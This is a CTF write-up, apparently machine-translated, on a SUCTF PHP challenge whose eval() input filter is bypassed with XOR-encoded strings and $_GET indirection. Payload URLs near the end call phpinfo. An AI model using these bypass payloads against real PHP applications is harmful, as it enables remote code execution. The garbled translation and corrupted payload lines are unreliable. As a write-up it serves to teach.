0x00: EDITORIAL
suctf Cup title and a strong network have encountered this type of subject, just as on a notebook to record it.
<?php $hhh = @$_GET['_']; if (!$hhh){ highlight_file(__FILE__); } if(strlen($hhh)>18){ die('One inch long, one inch strong!'); } if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) ) die('Try something else!'); $character_type = count_chars($hhh, 3); if(strlen($character_type)>12) die("Almost there!"); eval($hhh); ?>
Code ~ excerpt
There are two places you need to bypass
1: Incoming character length can be configured $ _GET [x] to bypass
2: preg_match can be bypassed by XOR
0x01: Ideas
Exclusive or in development may be used in place of some scenes is determined if
$a = 1^ 1; //0 $a = 0^ 0; //0 $a = 1^ 0; //1 $a = 0^ 1; //1
Return 0 or 1
First look at the regular
/ [\ 0-9A-Za-Z \ x00- ' "\ _ ~` &, |. = [\ x7F] + / I
\ XNN matching ASCII codes in the hexadecimal code nn characters
[x00-x7f] matching character ASCII values from 0-127
0-127 represents a single byte character, that is: the number of English characters, half-width symbols , as well as some control characters .
ah, anyway, not Chinese
ASCII [0-127] 0-127 alphanumeric characters of some characters and the like are all to be filtered
Bypassing the principle Free to kill a horse to make an example: In the production process to avoid killing the horse, php language features of the characters are based on! Operation will be converted to a character type bool type, and type bool operator encountered symbol, true numbers will automatically be converted to 1, false will automatically be converted to digital 0, if the bool type are calculated, using chr () function into character, use " . " to connect, it can bypass preg_match match. Learn more about php part is different from other languages But many of preg_match filter out " . " , We need to be using the XOR operation to bypass many of the horses are free to kill this production. php XOR character is first converted into ASCII characters and XOR, and a string of directly php XOR string, e.g. , " 123 " ^ " ABC " is " 1 " and " A " XOR then " 2 " and " b " XOR, and so on, at or after the end of exclusive access to the string you want. Precautions: when XORed to which the digital form is converted into characters, if the number (int) and the character of the exclusive OR, the result will be a number, for example. 1 ^ " A " =. 1, " A " ^ 2 = 2 , the string can be used to convert digital trim () function. expand: php characteristic use of undefined constant, will not automatically considered quote character string, the ASCII code is greater than 0x7F will be treated as string, may be seen to simplify the process or exclusive, any character will take the exclusive OR with the opposite 0xff so that it can reduce the amount of computation. GET or POST to pass around the characters preg_match example: The php eval () function in the implementation if there is a similar internal " abc " ^ " DEF " calculation formula, then first and then perform calculations, we can use and create parameters to achieve more convenient operation, for example, incoming? a = $ _GET [b], b is not limited since it can pass any value, but Note 1: find problems during testing, similar phpinfo ();, it is necessary to later (); on the back of the argument, for example, URL A? = {_ The GET} {B} (); & B = the phpinfo, i.e. a = $ {% ff% ff % ff% ff ^% a0% b8% ba% ab} {% ff} ();? &% ff = phpinfo, after passing actually $ {??? ? ^ ????} {} ();? but the eval () function inside will become $ {_ GET} {} ( );? successful implementation. Note 2: tests found to be calculated for the portion not enclosed in parentheses traditional values, because the brackets will also be recognized as a string passed, may be used instead of {}, because the use of undefined constant php characteristics, e.g. $ {_ GET} {a} this statement php is not judged as an error, defined as {} used variables, this sentence is automatically _GET will see a string, i.e. _GET $ [ ' a ' ]
github explain about this part of the
https://github.com/Samik081/ctf-writeups/blob/master/ISITDTU%20CTF%202019%20Quals/web/easyphp.md
In summary therefore, it can be transferred to bypass a length limit $ _GET [x] XOR bypassing preg_match
0x02:payload
Here you can use fuzz fuzz out _GET script
url? _ = $ {% fe% fe% fe% fe ^% a1% b9% bb% aa} {% fe} (); &% fe = phpinfo
url? _ = $ {% i% i% i% i ^% A0% b8% what% ab} {%} i (); i = &% phpinfo
a = $ {% ff% ff % ff% ff ^% a0% b8% ba% ab} {% ff} (); &% ff = phpinfo, after passing actually ???? $ ^ { ? ? ???} {} (); but to the eval () function inside will become $ {_ GET} {} ( ); successful implementation?
0x03: reference
https://www.cnblogs.com/cimuhuashuimu/p/ 11546422.html
https://www.jianshu.com/p/fbfeeb43ace2